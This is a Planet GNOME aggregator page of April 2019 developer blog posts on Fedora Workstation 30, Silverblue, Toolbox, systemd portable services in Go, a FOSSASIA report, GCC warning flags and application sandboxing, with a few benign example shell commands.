You are here

Planet GNOME

Subscribe to Feed Planet GNOME
Planet GNOME - http://planet.gnome.org/
Përditësimi: 1 ditë 21 min më parë

Sam Thursfield: The Lesson Planalyzer

Pre, 05/04/2019 - 5:23md

I’ve now been working as a teacher for 8 months. There are a lot of things I like about the job. One thing I like is that every day brings a new deadline. That sounds bad right? It’s not: one day I prepare a class, the next day I deliver the class one or more times and I get instant feedback on it right there and then from the students. I’ve seen enough of the software industry, and the music industry, to know that such a quick feedback loop is a real privilege!

Creating a lesson plan can be a slow and sometimes frustrating process, but the more plans I write the more I can draw on things I’ve done before. I’ve planned and delivered over 175 different lessons already. It’s sometimes hard to know if I’m repeating myself or not, or if I could be reusing an activity from a past lesson, so I’ve been looking for easy ways to look back at all my old lesson plans.

Search

GNOME’s Tracker search engine provides a good starting point for searching a setof lesson plans: I can put the plans in my ~/Documents folder, open the folder in Nautilus, and then I type a term like "present perfect" into the search bar.

The results aren’t as helpful as they could be, though. I can only see a short snippet of the text in each document, when I really need to see the whole paragraph for the result to be directly useful. Also, the search returns anything where the words present and perfect appear, so we could be talking about tenses, or birthdays, or presentation skills.  I wanted a better approach.

Reading .docx files

My lesson plans have a fairly regular structure. An all-purpose search tool doesn’t know anything about my personal approach to writing lesson plans, though. I decided to try writing my own tool to extract more structured information from the documents. The plans are in .docx format1 which is remarkably easy to parse — you just need the Python ‘unzip’ and ‘xml’ modules, and some guesswork to figure out what the XML elements mean. I was surprised not to find a Python library that already did this for me, but in the end I wrote a very basic .docx helper module, and I used this to create a tool that read my existing lesson plans and dumped the data as a JSON document.

It works reliably! In a few cases I chose to update documents rather than add code to the tool to deal with formatting inconsistencies. Also, the tool currently throws away all formatting information, but I barely notice.

Web and desktop apps

From there, of course, things got out of control and I started writing a simple web application to display and search the lesson plans. Two months of sporadic effort later, and I just made a prototype release of The Lesson Planalyzer. It remains to be seen how useful it is for anyone, including me, but it’s very satisfying to have gone from an idea to a prototype application in such a short time. Here’s an ugly screenshot, which displays a couple of example lesson plans that I found online.

The user interface is HTML5, made using Bootstrap and a couple of other cool JavaScript libraries (which I might mention in a separate blog post). I’ve wrapped that up in a basic GTK application, which runs a tiny HTTP server and uses a WebKitWebView display its output. The desktop application has a couple of features that can’t be implemented inside a browser, one is the ability to open plan documents directly in LibreOffice, and also the other is a dedicated entry in the alt+tab menu.

If you’re curious, you can see the source at https://gitlab.com/samthursfield/planalyzer/. Let me know if you think it might be useful for you!

1. I need to be able to print the documents on computers which don’t have LibreOffice available, so they are all in .docx format.

Christian Schaller: Preparing for Fedora Workstation 30

Mër, 03/04/2019 - 9:20md

I just installed the Fedora Workstation 30 Beta yesterday and so far things are looking great. As many others have reported to, with the GNOME 3.32 update things definitely feels faster and smoother. So I thought it was a good time to talk about what is coming in Fedora Workstation 30 and what we are currently working on.

Fractional Scaling: One of the big features that landed, although still considered experimental was the fractional scaling feature that has been a collaboration between Jonas Ådahl here at Red hat and Marco Trevisan at Canonical. It has taken quite some time since the initial hackfest as it is a complex task, but we are getting close. Fractional scaling is a critical feature for many HiDPI screen laptops to get a desktop size that perfectly fits their screen, not being to small or to large.

Screen sharing support for Chrome and Firefox under Wayland. The Wayland security model doesn’t allow any application to freely grab images or streams of the whole desktop like you could under X. This is of course a huge improvement in security, but it did cause some disruption for valid usecases like screen sharing with things like BlueJeans and Google Hangouts. We been working on resolving that with the help of PipeWire. We been at it for some time and things are now coming together. Chrome 73 ships with everything needed to make this work with Chrome, although you have to turn it on manually (got to this URL to turn it on: chrome://flags/#enable-webrtc-pipewire-capturer). The reason it needs to be manually enabled is not that it is unreliable, it is because the UI is still a little fugly due to a combination of feature overlap between the browser and the desktop and also how the security feature of the desktop is done. We are trying to come up with ways for the UI to be smoother without sacrificing your privacy/security. For Firefox we will keep shipping with our downstream patch until we manage to get it landed upstream.

Firefox for Wayland: Martin Stransky has been hard at work making Firefox be able to run Wayland-native. That work is tantalizingly near, but we decided to postpone it for Fedora Workstation 31 in the end to make sure it is really well polished before releasing it upon the world. The advantage of Wayland native Firefox is that in addition to bring us one step closer to not needing to run an X server (XWayland) all the time it also enables things like fractional scaling mentioned above to work for Firefox.

OpenH264 improved: As many of you know Firefox relies on a library called OpenH264, provided by Cisco, for its H264 video codec support for WebRTC. This library is also provided to Fedora users from Cisco free of charge (you can install it through GNOME Software). However its usefulness have been somewhat limited due to only supporting the baseline profile used for video calling, but not the Main and High profiles used by most online video content. Well what I can tell you is that Red Hat, Endless and Cisco partnered with Centricular some time ago to add support for decoding those profiles to OpenH264 and that work is now almost complete. The basic code enabling them is already merged, but Jan Schmidt at Centricular is working on fixing a few files that are still giving us problems. As soon as that is generally shipping we hope to get Firefox to be able to use OpenH264 also for things like Youtube playback and of course also use OpenH264 to playback any H264 using GStreamer applications like Totem. So a big thank you to Endless, Cisco and Centricular for working with us on this and thus enabling us to have a legal way to offer H264 support to our users.

NVidia binary driver support under Wayland: We been putting it quite a bit of effort trying to tie off the lose ends for using the NVidia binary driver with Wayland. We did manage to fix a long list of bugs like dealing with various colorspace issues, multimonitor setups and so on. For Intel and AMD graphics users things should actually be pretty good to go at this point. The last major item holding us back on the NVidia side is full support for using the binary driver with XWayland applications (native Wayland applications should work fine already). Adam Jackson worked diligently to get all the pieces in place and we do think we have a model now that will allow NVidia to provide an updated driver that should enable XWayland. As it stands though that driver update is likely to only come out towards the fall, so we will keep defaulting to X for NVidia binary driver users for some time more.

Gaming under Wayland. Olivier Fourdan and Jonas Ådahl has trying to crush any major Wayland bug reported for quite some time now and one area where we seem to have rounded the corner is for games. Valve has been kind enough to give us the ability to install and run any steam game for testing purposes, so whenever we found a game giving us trouble we have been able to let Olivier and Jonas reproduce it easily. So on my own gaming box I am now able to run all the Steam games I have under Wayland, including those using Proton, without a hitch. We haven’t tested with the full Steam catalog of course, there are thousands, so if your favourite game is giving you trouble under Wayland still, please let us know. Talking about gaming one area we will try to free up some cycles going forward to look deeper at is Flatpaks and gaming. We already done quite a bit of work in this area, with things like the NVidia binary driver extension and the Steam package on Flathub. But we know from leading linux game devs that there are still some challenges to be resolved, like making host device access for gamepads simpler from within the Flatpak sandbox.

Flatpak Creation in Fedora. Owen Taylor has been in charge of getting Flatpaks building in Fedora, ensuring we can produce Flatpaks from Fedora packages. Owen set up a system to track the Fedora Flatpak status, we got about 10 applications so far, but hope to greatly grow that number of time as we polish up the system. This enables us to start planning for shipping some applications in Fedora Workstation as Flatpaks by default in a future release. This respository will be available by default in Fedora workstation 30 and you can choose the flatpak version of the package through the new drop down box in the top right corner of GNOME Software. For now the RPM version of the package is still the default, but we expect to change that in later releases of Fedora Workstation.

Gedit in GNOME Software with Source drop down box

Fedora Toolbox – Debarshi Ray is leading the effort we call Fedora Toolbox, which is our starting point for our goal to revitalise and revolutionize development on Linux. Fedora Toolbox is trying to take the model of a pet container for development and make it seamless and natural. Our goal is to make it dead simple to create pet containers for your projects, so you can for instance have a Fedora pet container where you develop against the leading edge libraries and tools in Fedora, and you can have a RHEL based container where you develop against the library versions and tools shipping in RHEL (makes updating and fixing in production applications a lot easier) and maybe a SteamOS container to work on your little game project. Currently the model is that you have one pet container per OS your targeting, but we are pondering if maybe having one pet container per project would be even better if we can find good ways to avoid it being a lot of extra overhead (by for example having to re-install all your favourite command line tools in the container) or just outright confusing (which container got what tools and libraries again). Our goal here though is to ensure Fedora becomes the premier container native OS out there and thus a natural home for developers doing container development.
We are also working with the team inside Red Hat focusing on AI/ML and trying to ensure that we have a super smooth way for you to get a pet container with things like TensorFlow and CUDA up and running quickly.

Being an excellent platform for Openshift and Kubernetes development: We are putting effort into together with the Red Hat developer tools organization to bringing the OpenShift and CodeReady Studio and CodeReady Workspaces tools to Fedora. These tools have so far been very focused on RHEL support, but thanks to Flatpak for CodeReady Studio and web integration for CodeReady Workspaces we now have a path for making them easily available in Fedora too. In the world of Kubernetes OpenShift is where you want to be, and we want Fedora Workstation to be the ultimate portal for OpenShift development.

Fleet Commander with Active Directory support – So we are about to hit a very major milestone with Fleet Commander our large scale desktop management tool for Fedora and RHEL. Oliver Gutierrez has been hard at work making it work with Active Directory in addition to the existing FreeIPA support. We know that a majority of people interested in Fleet Commander are only using Active Directory currently, so being able to use Active Directory with Fleet Commander should make this great tool available to a huge number of new users. So if you are managing a University computer lab or a large number of Fedora or RHEL clients in your company we should soon have a Fleet Commander release out that you can use. And if you are not using Fedora or RHEL today well Fleet Commander is a very big reason for switching over!
We will do a proper announcement with further details once the release with Active Directory support is out.

PipeWire – I don’t have a major development to report, just a lot of steady work being done to stabilize and improve PipeWire. As mentioned earlier we now have Wayland screen sharing and recording working smoothly in the major browsers which is the user facing feature I think most of you will notice. Wim is still working on pushing the audio side it forward, but that is also a huge task. We have started talking about organizing a new hackfest soon to see if we can accelerate the effort further again. Likely scenario at this point in time is that we start enabling the JACK side of PipeWire first, maybe as early as Fedora Workstation 31, and then come back and do the PulseAudio replacement as a last stage.

Improved Input handling Another area we keep focusing on is improving input in Fedora. Peter Hutterer and Benjamin Tissoires are working hard on improving the stack. Peter just sent an extensive RFC out for how to deal with high resolution mice under Linux and Benjamin has been trying to get support for the Dell Totem landed. Neither will be there unfortunately for Fedora Workstation 30,but we expect to land this before Fedora Workstation 31.

Flicker-free boot
Hans de Goede has continued working on his effort to create a flicker-free boot experience with Fedora. The results of this work is on display in Fedora Workstation 30 and will for most of you now provide a seamless bootup experience . This effort is not so much about functionality as it is about ensuring you have an end-to-end polished experience with your Linux desktop. Things like the constant mode changes we seen in the past contribute to giving Linux an image of being unpolished and we want Fedora to be the vehicle that breaks down that image.

Ramping up Silverblue

For those of you following Fedora you are probably aware of Silverblue, which is our effort to re-think the Linux desktop distribution from the ground up and help us take the Linux desktop to a new level. The distribution model hasn’t really changed much over the last 20 years and we probably polished up the offering as far as we can within the scope of that model. For instance I upgraded my system to Fedora 30 beta yesterday and it was a long and tedious process of looking at about 6000 individual packages get updated from the Fedora 29 version to the Fedora 30 version one by one. I didn’t hit a lot of major snags despite this being a beta, but it is screamingly obvious that updating your operating system in this way is both slow and inherently fragile as anyone of those 6000 packages might hit a problem during upgrade and leave the system in a unknown state, especially since its common for packages to run scripts and similar as part of their upgrade.

Silverblue provides a revolutionary replacement for that process. First of all since it ships as a unified image we make life a lot easier for our QE team who can then test and verify against a single image which is in a known state. This in turn ensures that you as a user can feel confident that the new OS version will not break something on your system. And since the new version is just an image stored on your system next to the old one, upgrading is just about rebooting your system. There is no waiting for individual packages to get upgraded, as everything is already there and ready. Compare it to booting into a different kernel version on Fedora, it is quick and trivial.
And this also means that in the unlikely case that there is a problem with the new OS version you can just as easily go back to the previous version, by rebooting again and choosing to boot into that version. So you basically have instant upgrades with instant rollback if needed.
We believe this will radically change the way you look at OS upgrades forever, in fact you might almost forget they are happening.

And since Silverblue will basically be a Flatpak (and other containers) only OS you will have a clean delimitation between OS and applications. This means that even if we do major updates to the host, your applications should remain unaffected by the host OS update.
In fact we have some very interesting developments underway for Flatpak, with some major new efforts underway, efforts that I would love to talk about, but they are tied to some major Red Hat announcements that will happen at this years Red Hat Summit which will happen on May 7th – May 9th, so I will leave it as a teaser and then let you all know once the Summit is underway and Red Hats related major announcements are done.

There is a lot of work happening around Silverblue and as it happens Matthias Clasen wrote a long blog entry about it today. That blog goes into a lot more details on some of the Silverblue work items we been doing.

Anyway, I feel really excited about Silverblue and as we continue to refine the experience and figure out how everything will look in this brave new world I am sure everyone else will get excited too. Silverblue represents the single biggest evolution of the Linux desktop since the original GNOME and KDE releases back in the late nineties. It is not just about trying to tweak the existing experience, but an attempt at taking a big leap forward and provide an operating system that embodies all that we learned over these last 20 years and provide a natural home for developers and creators of all kind in our container centric computing future. Be sure to grab the Silverblue image of Fedora 30 beta and give it a test run. I recommend activating flathub.org repo to get started in order to get a decent range of applications available. As we move forward we are working hard to ensure that you have the world of applications available out of the box, so no need to go an enable any 3rd party repositories, but there are some more work that needs to happen before we can do that.

Summary
So Fedora Workstation 30 is going to be another exiting release of both of traditional RPM based Workstation version and of Silverblue, and I hope they will encourage even more people to join our rapidly growing Fedora community. Be sure to join us in #fedora-workstation on freenode IRC to talk!

Matthias Clasen: Silverblue at 1

Mër, 03/04/2019 - 8:07md

It has been a bit more than a year that we’ve set up the Atomic Workstation SIG. A little later,  we settled on the name Silverblue, and did a preview release with Fedora 29.

The recent F30 beta release is an good opportunity to look back. What have we achieved?

When we set out to turn Atomic Workstation into an every-day-usable desktop, we had a list of items that we knew needed to be addressed. As it turns out, we have solved most of them, or are very close to that.

Here is an unsorted list.

Full Flatpak support

GNOME Software already had support for installing Flatpaks, a year ago, so this is not 100% new. But the support has been greatly improved with the port to libflatpak – GNOME Software is now using the same code as the Flatpak commandline. And  more recently, it learned to display information about sandbox permissions, so that users can see what level of system access the installed applications have.

This information is now also available in the new Application Settings panel. The panel also offers some control over permissions and lets you clean up storage per application.

A Flatpak registry

Flathub is a great place to find desktop applications – there are over 500 now. But since we can’t enable Flathub by default, we have looked for an alternative, and started to provide Flatpak apps in the Fedora container registry. This is taking advantage of Flatpaks support for the OCI format, and uses the Fedora module-build-system.

GNOME Software support for rpm-ostree

GNOME Software was designed as an application installer, but it also provides the UI for OS updates and upgrades. On a Silverblue system, that means supporting rpm-ostree. GNOME Software has learned to do this.

Another bit of functionality for which GNOME Software was traditionally talking to PackageKit is Addons. These are things that could be classified as system extensions: fonts, language support, shell extensions,, etc.  On a Silverblue system, the direct replacement is to use the rpm-ostree layering capability to add such packages to the OS image. GNOME Software knows how to do this now. It is not ideal, since you probably don’t expect to have to reboot your system for installing a font. But it gets us the basic functionality back until we have better solutions for system extensions.

Nvidia driver support

One class of system extensions that I haven’t mention in the previous section is drivers.  If you have an Nvidia graphics card, you may want the Nvidia driver to make best use of your hardware.  The situation with the Nvidia drivers is a little more complicated than with plain rpms, since the rpm needs to match your kernel, and if you don’t have the right driver, your system may boot to a black screen.

These complications are not unique to Silverblue, and the traditional solution for this in Fedora is to use the akmod system to build drivers that match your kernel. With Fedora 30, we put the necessary changes in place in rpm-ostree and the OS image to make this work for Silverblue as well.

Third-party rpms

Fedora contains a lot of apps, but there’s always the odd one that you can’t find in the repositories. A popular app in this category is the Chrome browser. Thankfully, Google provides an rpm that works on Fedora. But, it installs its content into /opt. That is not technically wrong, but causes a problem on Silverblue, since rpm-ostree has so far insisted on keeping packaged content under its tight control in /usr.

Ultimatively, we  want to see apps shipped as Flatpaks, but for Fedora 30, we have managed to get rpm-ostree to handle this situation, so chrome and similar 3rd party rpms can now be installed via package layering on Silverblue.

A toolbox

An important target audience for Fedora Workstation is developers. Not being able to install toolchains and libraries (because the OS is immutable) is obviously not going to make this audience happy.

The short answer is: switch to container-based workflows. Its the future!

But that doesn’t excuse us  from making these workflows easy and convenient for people who are used to the power of the commandline. So, we had to come up with a better answer, and started to develop the toolbox. The toolbox is a commandline tool to take the pain out of working with ‘pet’ containers. With a single command,

toolbox enter

it gives you a ‘traditional’ Fedora environment with dnf,  where you can install the packages you need. The toolbox has the infrastructure to manage multiple named containers, so you can work on different projects in parallel without interference.

Whats missing?

There are many bigger and smaller things that can still be improved – software is never finished. To name just a few:

  • Make IDEs work well with containers on an immutable OS
  • Codec availability and installation
  • Handle “difficult” applications such as virtualbox well
  • Find better ways to handle system extensions

But we’ve come a long way in the one year since I’ve started using Atomic Workstation as my day-to-day OS.

If you want to see for yourself, download the F30 beta image and give it a try!

Debarshi Ray: Fedora Toolbox is now just Toolbox

Mër, 03/04/2019 - 7:52md

Fedora Toolbox has been renamed to just Toolbox. Even though the project is obviously driven by the needs of Fedora Silverblue and uses technologies like Buildah and Podman that are driven by members of the wider Fedora project, it was felt that a toolbox container is a generic concept that appeals to a lot many more communities than just Fedora. You can also think of it as a nod to coreos/toolbox which served as the original inspiration for the project, and there are plans to use it in Fedora CoreOS too.

If you’re curious, here’s a subset of the discussion that drove the renaming.

There have already been two releases with the new name, so I assume that almost all users have been migrated.

Note that the name of the base OCI image for creating Fedora toolbox containers is still fedora-toolbox for obvious namespacing reasons, but the names of the client-side command line tool, and the overall project itself have changed. That way you could have a debian-toolbox, a centos-toolbox and so on.

It should be obvious, but the Toolbox logo was designed and created by Jakub Steiner.

Lennart Poettering: Walkthrough for Portable Services in Go

Mër, 03/04/2019 - 7:36md
Portable Services Walkthrough (Go Edition)

A few months ago I posted a blog story with a walkthrough of systemd Portable Services. The example service given was written in C, and the image was built with mkosi. In this blog story I'd like to revisit the exercise, but this time focus on a different aspect: modern programming languages like Go and Rust push users a lot more towards static linking of libraries than the usual dynamic linking preferred by C (at least in the way C is used by traditional Linux distributions).

Static linking means we can greatly simplify image building: if we don't have to link against shared libraries during runtime we don't have to include them in the portable service image. And that means pretty much all need for building an image from a Linux distribution of some kind goes away as we'll have next to no dependencies that would require us to rely on a distribution package manager or distribution packages. In fact, as it turns out, we only need as few as three files in the portable service image to be fully functional.

So, let's have a closer look how such an image can be put together. All of the following is available in this git repository.

A Simple Go Service

Let's start with a simple Go service, an HTTP service that simply counts how often a page from it is requested. Here are the sources: main.go — note that I am not a seasoned Go programmer, hence please be gracious.

The service implements systemd's socket activation protocol, and thus can receive bound TCP listener sockets from systemd, using the $LISTEN_PID and $LISTEN_FDS environment variables.

The service will store the counter data in the directory indicated in the $STATE_DIRECTORY environment variable, which happens to be an environment variable current systemd versions set based on the StateDirectory= setting in service files.

Two Simple Unit Files

When a service shall be managed by systemd a unit file is required. Since the service we are putting together shall be socket activatable, we even have two: portable-walkthrough-go.service (the description of the service binary itself) and portable-walkthrough-go.socket (the description of the sockets to listen on for the service).

These units are not particularly remarkable: the .service file primarily contains the command line to invoke and a StateDirectory= setting to make sure the service when invoked gets its own private state directory under /var/lib/ (and the $STATE_DIRECTORY environment variable is set to the resulting path). The .socket file simply lists 8080 as TCP/IP port to listen on.

An OS Description File

OS images (and that includes portable service images) generally should include an os-release file. Usually, that is provided by the distribution. Since we are building an image without any distribution let's write our own version of such a file. Later on we can use the portablectl inspect command to have a look at this metadata of our image.

Putting it All Together

The four files described above are already every file we need to build our image. Let's now put the portable service image together. For that I've written a Makefile. It contains two relevant rules: the first one builds the static binary from the Go program sources. The second one then puts together a squashfs file system combining the following:

  1. The compiled, statically linked service binary
  2. The two systemd unit files
  3. The os-release file
  4. A couple of empty directories such as /proc/, /sys/, /dev/ and so on that need to be over-mounted with the respective kernel API file system. We need to create them as empty directories here since Linux insists on directories to exist in order to over-mount them, and since the image we are building is going to be an immutable read-only image (squashfs) these directories cannot be created dynamically when the portable image is mounted.
  5. Two empty files /etc/resolv.conf and /etc/machine-id that can be over-mounted with the same files from the host.

And that's already it. After a quick make we'll have our portable service image portable-walkthrough-go.raw and are ready to go.

Trying it out

Let's now attach the portable service image to our host system:

# portablectl attach ./portable-walkthrough-go.raw (Matching unit files with prefix 'portable-walkthrough-go'.) Created directory /etc/systemd/system.attached. Created directory /etc/systemd/system.attached/portable-walkthrough-go.socket.d. Written /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf. Copied /etc/systemd/system.attached/portable-walkthrough-go.socket. Created directory /etc/systemd/system.attached/portable-walkthrough-go.service.d. Written /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf. Created symlink /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf → /usr/lib/systemd/portable/profile/default/service.conf. Copied /etc/systemd/system.attached/portable-walkthrough-go.service. Created symlink /etc/portables/portable-walkthrough-go.raw → /home/lennart/projects/portable-walkthrough-go/portable-walkthrough-go.raw.

The portable service image is now attached to the host, which means we can now go and start it (or even enable it):

# systemctl start portable-walkthrough-go.socket

Let's see if our little web service works, by doing an HTTP request on port 8080:

# curl localhost:8080 Hello! You are visitor #1!

Let's try this again, to check if it counts correctly:

# curl localhost:8080 Hello! You are visitor #2!

Nice! It worked. Let's now stop the service again, and detach the image again:

# systemctl stop portable-walkthrough-go.service portable-walkthrough-go.socket # portablectl detach portable-walkthrough-go Removed /etc/systemd/system.attached/portable-walkthrough-go.service. Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf. Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf. Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d. Removed /etc/systemd/system.attached/portable-walkthrough-go.socket. Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf. Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d. Removed /etc/portables/portable-walkthrough-go.raw. Removed /etc/systemd/system.attached.

And there we go, the portable image file is detached from the host again.

A Couple of Notes
  1. Of course, this is a simplistic example: in real life services will be more than one compiled file, even when statically linked. But you get the idea, and it's very easy to extend the example above to include any additional, auxiliary files in the portable service image.

  2. The service is very nicely sandboxed during runtime: while it runs as regular service on the host (and you thus can watch its logs or do resource management on it like you would do for all other systemd services), it runs in a very restricted environment under a dynamically assigned UID that ceases to exist when the service is stopped again.

  3. Originally I wanted to make the service not only socket activatable but also implement exit-on-idle, i.e. add a logic so that the service terminates on its own when there's no ongoing HTTP connection for a while. I couldn't figure out how to do this race-freely in Go though, but I am sure an interested reader might want to add that? By combining socket activation with exit-on-idle we can turn this project into an excercise of putting together an extremely resource-friendly and robust service architecture: the service is started only when needed and terminates when no longer needed. This would allow to pack services at a much higher density even on systems with few resources.

  4. While the basic concepts of portable services have been around since systemd 239, it's best to try the above with systemd 241 or newer since the portable service logic received a number of fixes since then.

Further Reading

A low-level document introducing Portable Services is shipped along with systemd.

Please have a look at the blog story from a few months ago that did something very similar with a service written in C.

There are also relevant manual pages: portablectl(1) and systemd-portabled(8).

Tristan Van Berkom: FOSSASIA 2019 Report

Mër, 03/04/2019 - 12:36md

Hi,

This post is a broad summary of my experience at FOSSASIA this year in Singapore.

Singapore

This was my first visit to Singapore, and I think it is a very nice and interesting place. The city is very clean (sometimes disturbingly so), the food I encountered was mostly Chinese and Indian, and while selling food out of carts on the street has been outlawed some time ago, there is thankfully still a strong culture of street food available in the various “Hawker Centres” (food courts) where the previous street vendors have taken up shop instead.

From my very limited experience there, I would have to recommend roaming around China Town food street and enjoying beer and food (be warned, beer in Singapore is astoundingly expensive !)… Here is a picture of what it looks like.

Many of us ate food here on Friday night

 

 

 

Since the majority of people living in Singapore can speak English, I think this is a great place for a westerner to enjoy their first taste of the Asian experience, without being too disoriented.

The Presentations

The Conference took place in the Lifelong Learning Institute this year, and asides from its obvious focus on FOSS, the conference has a strong focus on education, and also open hardware. There are many students who attend the conference, many whom participated in an exciting hackathon.

There were a lot of talks, so I’ll just summarize some of the talks which I attended and found particularly memorable.

Open Science, Open Mind

In the opening sessions, Lim Tit Meng, who was responsible for hosting FOSSASIA in previous years at Science Centre Singapore, gave an inspirational talk which I thought was quite moving. To quote from the summary of his talk:

Scientific information, discoveries, and inventions should be treated as an open source to benefit as many people and sectors as possible.

There are many reasons for people to get involved in FOSS these days. The ideals of software freedom has been a strong driver, the desire to create software that is superior in quality compared to software developed in silo has been a strong driver for myself. What I took home from Lim Tit Meng’s talk is that FOSS also embodies the spirit of sharing knowledge simply for the good of humanity, that we shouldn’t limit this sharing only to software but that it should extend across all the sciences, and this is a very powerful idea.

Betrusted & the Case for Trusted I/O

Also on the first day, Bunnie Huang joined us to talk about his project Betrusted, an open hardware design comprised of a simple display, input device and fpga. The idea is to have a hardware design which can be easily audited and validated for tampering, and it can be used to store your private matters separately from your complicated mobile device such as a hand phone or tablet.

I think Bunnie gave a very clear overview of the various attack surfaces we need to care about when considering modern personal computing devices.

The blockchain talks

I attended two talks with a focus on applications of blockchain technology, these were interesting to watch for people like me who don’t really have any deep understanding of blockchain (or crypto), but would like to have a higher level understanding of what kinds of applications we can use blockchain for.

First, Ong Khai Wei from IBM gave a talk entitled What would you build next with Blockchain ? where he shared some of the current applications of blockchain technology and introduced us to Hyperledger, a system for managing supply chains.

The other blockchain talk I attended was presented by Jollen Chen, presenting Flowchain, he talked mostly about how we can store and transfer data in a network of IoT devices using Flowchain and IPFS.

Open Source Quantum Computing

Matthew Treinish gave an interesting talk for people like me who know basically nothing about quantum computing. As someone who got interested in quantum computing purely as a hobby, I thought he was perfectly placed to explain things in terms that are simple enough to understand.

Open Source Hardware and Education

This report would be incomplete without a mention of Mitch Altman, a charismatic fellow with an enthusiasm for teaching and inspiring youth to get interested in making things work.

He also gave a workshop in the afternoons where he was teaching people to solder using a selection of kits with neat little lights and speakers.

Open Source Firmware

This was another interesting talk delivered by Daniel Maslowski and Philipp Deppenwiese, unfortunately I was not able to find a recording of this talk.

It included a history of open source firmwares and Daniel’s story as an end user, and the hoops he needed to jump through in order to upgrade his proprietary firmware.

Finally there was a demo where Daniel successfully bricked a laptop for us using the manufacturer’s closed source BIOS updater, and upgraded the firmware on another laptop using Coreboot (I presume the bricked machine has come back to life by now).

My BuildStream Talk

Yes, I did attend my own talk. Although I should say it is by far the worst presentation I have ever given.

The lesson to take home for me is: take the time to understand your target audience and adapt your talk to be more suitable for the audience. My biggest mistake here is that I had adapted material from previous presentations, but those previous presentations had a very technical audience; I could tell as soon as I started my presentation that the people in the room clearly had no idea what I was talking about (although I did ask for a show of hands in a couple of instances and stopped to explain some things which clearly needed explaining).

Instead of explaining how our tooling addresses various problems in existing tooling and how we aim to cleanly separate the “build” problem from the “deployment” problem – I really should have taken a step back and made a presentation about “Why people should care about how their software gets built and integrated” in general.

Closing Ceremonies

On the last day of the conference, we got to see the students who participated in the hackathon present the applications they developed.

The hackathon itself had some interesting guidelines. As UNESCO is one of the primary sponsors of the FOSSASIA event, it seemed fitting that the hackathon competition entries should be related to protecting endangered indigenous languages and culture, in observation of the Year of Indigenous Languages.

The result was truly splendid and this was probably my favorite part of the entire conference. You can watch the young coders presenting their projects here.

FOSSASIA 2019 Organizers and Volunteers

 

 

 

 

 

 

 

 

 

 

On the closing day there was also a professional photographer taking pictures of anyone who volunteered, I took the opportunity to get a “GNOME + GitLab” photo as I was wearing my GUADEC shirt and some of the GitLab development team was also present.

GNOME and GitLab join forces !

 

 

 

Thankyou

I’d like to thank Hong Phuc for accepting my paper on such short notice, and all of the organizers and volunteers who’s hard work helped to make this such a wonderful event.

And of course, thanks to Codethink for sponsoring my travel and allowing me to participate in this event !

 

 

 

Debarshi Ray: About -Wextra and -Wcast-function-type

Hën, 01/04/2019 - 1:07md

About eight months ago, around the time when GCC 8.x started showing up on my computers, I started moving my code away from using -Wextra. This aligns nicely with the move to the Meson build system, which is nice; but went against the flow of Autotools’ AX_COMPILER_FLAGS, which isn’t ideal but is an acceptable trade-off.

But why?

GCC 8.x added a warning called -Wcast-function-type to the -Wextra umbrella. It warns when a function pointer is cast to an incompatible function. At a glance, this seems desirable, but it isn’t. It runs contrary to one of the widely used C idioms in GNOME. For example, it’s triggered by this text book use of g_list_copy_deep to copy a list of reference counted objects:

another_list = g_list_copy_deep (list, (GCopyFunc) g_object_ref, NULL);

Note that this is different from -Wincompatible-pointer-types, which would’ve triggered if the cast to GCopyFunc was missing:

another_list = g_list_copy_deep (list, g_object_ref, NULL);

It’s easy to imagine similar examples with uses of gtk_container_forall or gtk_container_foreach with gtk_widget_destroy, and so on.

The C standard (eg., see article 6.5.2.2 of the C11 standard) steps around the issue of passing more arguments to a function than it actually has parameters for by calling it undefined behaviour. However, the calling conventions of all the platforms supported by GLib are defined in a way to make this work.

So how do we disable -Wcast-function-type?

One option is to use a compiler directive with #pragma as suggested by AX_COMPILER_FLAGS. However, attempts to ignore it through a #pragma on older versions of GCC that didn’t have this specific warning will trigger -Wpragmas, and, ironically, using G_GNUC_CHECK_VERSION to conditionally disable it on newer compilers will trigger -Wexpansion-to-defined, again, because of -Wextra and the fact that the implementation of the macro has a #ifdef around __GNUC__. Regardless, for a warning that gets triggered by such a widely used programming construct, it would lead to a ton of boilerplate all over the codebase, instead of being a solitary exception tucked away in one corner of the project.

Therefore, my preference has been to append -Wno-cast-function-type and -Wno-error=cast-function-type to the list of compiler flags of modules using -Wextra. This avoids almost all of the above problems. One small wrinkle is that if a translation unit or file does trigger some other unrelated diagnostic, then an older compiler will also emit -Wunknown-warning for the presence of the unknown -Wno-cast-function-type flag. I find this acceptable because, in the first place, a file shouldn’t trigger any other diagnostic, especially on an older compiler, and if there does happen to be something, say a deprecation warning, then it’s likely something that needs to be fixed anyway.

Given that this can repeat with future versions of GCC, it seems wiser to avoid -Wextra and instead explicitly list out the desired compiler warnings. This isn’t hard to do because the GCC documentation clearly marks which warnings are turned on by -Wextra, -Wpedantic, etc..

Christian Hergert: Designing for Sandboxes

Hën, 01/04/2019 - 8:36pd

One of the things I talked about in my talk at Scale 17x is that there are a number of platform features coming that are enevitable.

One of those is application sandboxing.

But not every component within an application is created equal or deserves equal access to user data and system configuration. Building the next big application is increasingly requiring thinking about how you segment applications into security domains.

Given the constraints of our current operating systems, that generally means processes. Google’s Chrome was one of the first major applications to do this. The Chrome team had created a series of processes focused on different features. Each of those processes had capabilities removed (such as network, or GPU access) from the process space to reduce the damage of an attack.

Recently Google released sandboxed-api, which is an interesting idea around automatically sandboxing libraries on Linux. While interesting, limiting myself to designs that are Linux only is not currently realistic for my projects.

Since I happen to work on an IDE, one of the technologies I’ve had to become familiar with is Microsoft’s Language Server Protocol. It’s a design for worker processes to provide language-specific features.

It usually works like this:

  • Spawn a worker process, with a set of pipe()s for stdin/stdout you control
  • Use JSONRPC over the pipe()s with some well-formatted JSON commands

This design can be good for sandboxing because it allows you to spawn subprocesses that have reduced system capabilities, easily clean up after them, and provides an IPC format. Despite having written jsonrpc-glib and a number of helpers to make writing JSON from C rather clean, I’m still unhappy with it for a number of reasons. Those reasons range from everything from performance to correctness to brittleness of nonconforming implementations.

